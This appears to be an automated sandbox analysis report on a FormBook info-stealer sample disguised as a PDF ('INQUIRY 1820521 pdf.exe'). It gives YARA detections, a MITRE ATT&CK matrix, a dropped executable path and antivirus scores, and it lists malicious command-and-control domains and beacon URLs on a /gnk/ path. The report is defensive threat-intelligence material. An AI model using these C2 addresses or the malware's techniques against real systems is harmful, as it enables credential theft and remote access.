Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\segoeuii.ttf VolumeInformation
Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe	Queries volume information: C:\Windows\Fonts\segoeuiz.ttf VolumeInformation

Source: C:\Users\user\Desktop\INQUIRY 1820521 pdf.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack, type: UNPACKEDPE

Remote Access Functionality:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000009.00000002.727064011.00000000013C0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.725306924.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.907270065.0000000000A00000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.727127963.00000000013F0000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.907534755.0000000000B20000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.682219673.000000000492C000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000010.00000002.908039234.0000000002C80000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack, type: UNPACKEDPE

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	Scheduled Task/Job1	Scheduled Task/Job1	Process Injection612	Rootkit1	Credential API Hooking1	Security Software Discovery331	Remote Services	Credential API Hooking1	Exfiltration Over Other Network Medium	Encrypted Channel1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Shared Modules1	Boot or Logon Initialization Scripts	Scheduled Task/Job1	Masquerading1	Input Capture1	Process Discovery2	Remote Desktop Protocol	Input Capture1	Exfiltration Over Bluetooth	Ingress Tool Transfer2	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	At (Linux)	Logon Script (Windows)	Logon Script (Windows)	Disable or Modify Tools1	Security Account Manager	Virtualization/Sandbox Evasion41	SMB/Windows Admin Shares	Archive Collected Data1	Automated Exfiltration	Non-Application Layer Protocol2	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	Virtualization/Sandbox Evasion41	NTDS	Remote System Discovery1	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol12	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Process Injection612	LSA Secrets	System Network Configuration Discovery1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	Deobfuscate/Decode Files or Information1	Cached Domain Credentials	File and Directory Discovery1	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	Obfuscated Files or Information4	DCSync	System Information Discovery112	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Software Packing3	Proc Filesystem	Network Service Scanning	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source	Detection	Scanner	Label	Link
INQUIRY 1820521 pdf.exe	39%	Virustotal		Browse
INQUIRY 1820521 pdf.exe	19%	Metadefender		Browse
INQUIRY 1820521 pdf.exe	41%	ReversingLabs	ByteCode-MSIL.Spyware.Noon

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Roaming\YAhcdYrYHFkNNf.exe	19%	Metadefender		Browse
C:\Users\user\AppData\Roaming\YAhcdYrYHFkNNf.exe	41%	ReversingLabs	ByteCode-MSIL.Spyware.Noon

Unpacked PE Files

Source	Detection	Scanner	Label	Link	Download
9.2.INQUIRY 1820521 pdf.exe.400000.0.unpack	100%	Avira	TR/Crypt.ZPACK.Gen		Download File

Domains

Source	Detection	Scanner	Label	Link
hhcuerkn.com	0%	Virustotal		Browse

URLs

Source	Detection	Scanner	Label
http://www.founder.com.cn/cnP	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/bThe	0%	URL Reputation	safe
http://www.mobcitylabs.com/gnk/?sZvD88=SYZO30Rw9/xWTIeSKGPhX7HmTPZweoUXDGzJY+4zU//Zy+/I+iT+Zq6wGsmgWs8tlcqs&Ezr0pl=DnbLuT	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr-e	0%	Avira URL Cloud	safe
http://www.carterandcone.comTCV	0%	Avira URL Cloud	safe
http://www.hhcuerkn.com/gnk/?Ezr0pl=DnbLuT&sZvD88=H+m5DnQ6CNrLWDhOr9+GU7qZReU4k+N7/cnPpyZ0AIPp8Rivccl87rPwP+687pRYxKR0	0%	Avira URL Cloud	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://www.tiro.com	0%	URL Reputation	safe
http://weather.gc.ca/astro/seeing_e.html)	0%	Avira URL Cloud	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.goodfont.co.kr	0%	URL Reputation	safe
http://www.carterandcone.com	0%	URL Reputation	safe
http://www.carterandcone.com	0%	URL Reputation	safe
http://www.carterandcone.com	0%	URL Reputation	safe
http://www.monotype.5;M	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cnD	0%	Avira URL Cloud	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.sajatypeworks.com	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.typography.netD	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.founder.com.cn/cn/cThe	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://www.galapagosdesign.com/staff/dennis.htm	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://fontfabrik.com	0%	URL Reputation	safe
http://www.carterandcone.com?	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cnl	0%	URL Reputation	safe
http://www.founder.com.cn/cnl	0%	URL Reputation	safe
http://www.founder.com.cn/cnl	0%	URL Reputation	safe
http://www.founder.com.cn/cn0A	0%	Avira URL Cloud	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.galapagosdesign.com/DPlease	0%	URL Reputation	safe
http://www.founder.com.cn/cna	0%	URL Reputation	safe
http://www.founder.com.cn/cna	0%	URL Reputation	safe
http://www.founder.com.cn/cna	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.%s.comPA	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.sandoll.co.kr	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.urwpp.deDPlease	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.zhongyicts.com.cn	0%	URL Reputation	safe
http://www.carterandcone.com11	0%	Avira URL Cloud	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.sakkal.com	0%	URL Reputation	safe
http://www.goodfont.co.krs-cz	0%	Avira URL Cloud	safe
http://www.sandoll.co.kr?	0%	Avira URL Cloud	safe
http://www.tiro.comTZ	0%	Avira URL Cloud	safe
http://www.carterandcone.come7	0%	Avira URL Cloud	safe
www.auggiepaws.com/gnk/	0%	Avira URL Cloud	safe
http://www.tiro.coms	0%	Avira URL Cloud	safe
http://www.carterandcone.comTC	0%	URL Reputation	safe
http://www.carterandcone.comTC	0%	URL Reputation	safe
http://www.carterandcone.comTC	0%	URL Reputation	safe
http://www.carterandcone.coms-c	0%	Avira URL Cloud	safe
http://www.founder.com.c	0%	URL Reputation	safe
http://www.founder.com.c	0%	URL Reputation	safe
http://www.founder.com.c	0%	URL Reputation	safe
http://www.founder.com.cn/cnCg	0%	Avira URL Cloud	safe
http://en.wikip	0%	URL Reputation	safe
http://en.wikip	0%	URL Reputation	safe
http://en.wikip	0%	URL Reputation	safe
http://www.founder.com.c~	0%	Avira URL Cloud	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.carterandcone.coml	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.founder.com.cn/cn	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.jiyu-kobo.co.jp/	0%	URL Reputation	safe
http://www.sandoll.co.krim	0%	Avira URL Cloud	safe
http://www.xinghai-nb.com/gnk/?Ezr0pl=DnbLuT&sZvD88=xQkMVUIjVgEDTyCEhmabftVVaeWVPbzi+0a4N1BcO5prH32uPLxq/R2onmpvBIdlFaM0	0%	Avira URL Cloud	safe
http://www.founder.com.cn/cnu-e	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
www.xinghai-nb.com	104.21.82.58	true	true		unknown
hhcuerkn.com	210.152.87.233	true	true	0%, Virustotal, Browse	unknown
ext-sq.squarespace.com	198.185.159.144	true	false		high
www.hhcuerkn.com	unknown	unknown	true		unknown
www.mobcitylabs.com	unknown	unknown	true		unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.mobcitylabs.com/gnk/?sZvD88=SYZO30Rw9/xWTIeSKGPhX7HmTPZweoUXDGzJY+4zU//Zy+/I+iT+Zq6wGsmgWs8tlcqs&Ezr0pl=DnbLuT	true	Avira URL Cloud: safe	unknown
http://www.hhcuerkn.com/gnk/?Ezr0pl=DnbLuT&sZvD88=H+m5DnQ6CNrLWDhOr9+GU7qZReU4k+N7/cnPpyZ0AIPp8Rivccl87rPwP+687pRYxKR0	true	Avira URL Cloud: safe	unknown
www.auggiepaws.com/gnk/	true	Avira URL Cloud: safe	low
http://www.xinghai-nb.com/gnk/?Ezr0pl=DnbLuT&sZvD88=xQkMVUIjVgEDTyCEhmabftVVaeWVPbzi+0a4N1BcO5prH32uPLxq/R2onmpvBIdlFaM0	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.fontbureau.com/designersG	INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cnP	INQUIRY 1820521 pdf.exe, 00000000.00000003.647365579.00000000086A6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers/?	INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn/bThe	INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.goodfont.co.kr-e	INQUIRY 1820521 pdf.exe, 00000000.00000003.647112356.000000000868A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers?	INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	false		high
http://www.carterandcone.comTCV	INQUIRY 1820521 pdf.exe, 00000000.00000003.648173441.0000000008675000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
https://www.sogou.com/web?query=%22xinghai-nb.com%22&ie=utf8	ipconfig.exe, 00000010.00000002.909460899.0000000003C6F000.00000004.00000001.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name4	INQUIRY 1820521 pdf.exe, 00000000.00000002.681087935.000000000316C000.00000004.00000001.sdmp	false		high
http://www.tiro.com	explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
https://www.baidu.com/s?ie=utf-8&f=8&rsv_bp=1&rsv_idx=1&tn=baidu&wd=%22xinghai-nb.com%22	ipconfig.exe, 00000010.00000002.909460899.0000000003C6F000.00000004.00000001.sdmp	false		high
http://weather.gc.ca/astro/seeing_e.html)	INQUIRY 1820521 pdf.exe	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers	explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	false		high
http://www.goodfont.co.kr	INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, INQUIRY 1820521 pdf.exe, 00000000.00000003.647112356.000000000868A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.com	INQUIRY 1820521 pdf.exe, 00000000.00000003.649744623.0000000008690000.00000004.00000001.sdmp, INQUIRY 1820521 pdf.exe, 00000000.00000003.648154043.0000000008690000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.monotype.5;M	INQUIRY 1820521 pdf.exe, 00000000.00000003.651699352.0000000008690000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
https://stackpath.bootstrapcdn.com/bootstrap/4.5.0/css/bootstrap.min.css	INQUIRY 1820521 pdf.exe, 00000000.00000002.681685603.0000000003579000.00000004.00000001.sdmp	false		high
http://www.founder.com.cn/cnD	INQUIRY 1820521 pdf.exe, 00000000.00000003.647389949.00000000086A6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sajatypeworks.com	INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.typography.netD	INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn/cThe	INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.galapagosdesign.com/staff/dennis.htm	INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://fontfabrik.com	INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.com?	INQUIRY 1820521 pdf.exe, 00000000.00000003.648173441.0000000008675000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.cn/cnl	INQUIRY 1820521 pdf.exe, 00000000.00000003.647389949.00000000086A6000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cn0A	INQUIRY 1820521 pdf.exe, 00000000.00000003.647389949.00000000086A6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.galapagosdesign.com/DPlease	INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cna	INQUIRY 1820521 pdf.exe, 00000000.00000003.647266371.000000000868A000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.%s.comPA	explorer.exe, 0000000A.00000002.909308759.0000000002B50000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	low
http://www.fonts.com	INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	false		high
http://www.sandoll.co.kr	INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, INQUIRY 1820521 pdf.exe, 00000000.00000003.647112356.000000000868A000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.urwpp.deDPlease	INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.zhongyicts.com.cn	INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.com11	INQUIRY 1820521 pdf.exe, 00000000.00000003.648154043.0000000008690000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	INQUIRY 1820521 pdf.exe, 00000000.00000002.681087935.000000000316C000.00000004.00000001.sdmp, INQUIRY 1820521 pdf.exe, 00000000.00000002.681042988.0000000003121000.00000004.00000001.sdmp	false		high
http://www.sakkal.com	INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html?	INQUIRY 1820521 pdf.exe, 00000000.00000003.651191297.000000000868E000.00000004.00000001.sdmp	false		high
http://www.goodfont.co.krs-cz	INQUIRY 1820521 pdf.exe, 00000000.00000003.647112356.000000000868A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.sandoll.co.kr?	INQUIRY 1820521 pdf.exe, 00000000.00000003.647112356.000000000868A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.apache.org/licenses/LICENSE-2.0	INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	false		high
http://www.fontbureau.com	INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	false		high
http://www.tiro.comTZ	INQUIRY 1820521 pdf.exe, 00000000.00000003.647616493.00000000086A5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.come7	INQUIRY 1820521 pdf.exe, 00000000.00000003.649744623.0000000008690000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.tiro.coms	INQUIRY 1820521 pdf.exe, 00000000.00000003.647616493.00000000086A5000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.carterandcone.comTC	INQUIRY 1820521 pdf.exe, 00000000.00000003.648173441.0000000008675000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.carterandcone.coms-c	INQUIRY 1820521 pdf.exe, 00000000.00000003.648173441.0000000008675000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.founder.com.c	INQUIRY 1820521 pdf.exe, 00000000.00000003.647449439.00000000086A8000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.cn/cnCg	INQUIRY 1820521 pdf.exe, 00000000.00000003.647389949.00000000086A6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://en.wikip	INQUIRY 1820521 pdf.exe, 00000000.00000003.649744623.0000000008690000.00000004.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.founder.com.c~	INQUIRY 1820521 pdf.exe, 00000000.00000003.647449439.00000000086A8000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	low
http://www.carterandcone.coml	INQUIRY 1820521 pdf.exe, 00000000.00000003.648154043.0000000008690000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/cabarga.htmlN	INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cn	INQUIRY 1820521 pdf.exe, 00000000.00000003.647389949.00000000086A6000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.fontbureau.com/designers/frere-user.html	INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	false		high
http://www.jiyu-kobo.co.jp/	INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	false	URL Reputation: safe URL Reputation: safe URL Reputation: safe	unknown
http://www.sandoll.co.krim	INQUIRY 1820521 pdf.exe, 00000000.00000003.647112356.000000000868A000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown
http://www.fontbureau.com/designers8	INQUIRY 1820521 pdf.exe, 00000000.00000002.687768375.0000000009882000.00000004.00000001.sdmp, explorer.exe, 0000000A.00000000.704043522.000000000B970000.00000002.00000001.sdmp	false		high
http://www.founder.com.cn/cnu-e	INQUIRY 1820521 pdf.exe, 00000000.00000003.647365579.00000000086A6000.00000004.00000001.sdmp	false	Avira URL Cloud: safe	unknown

Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public

IP	Domain	Country	ASN	ASN Name	Malicious
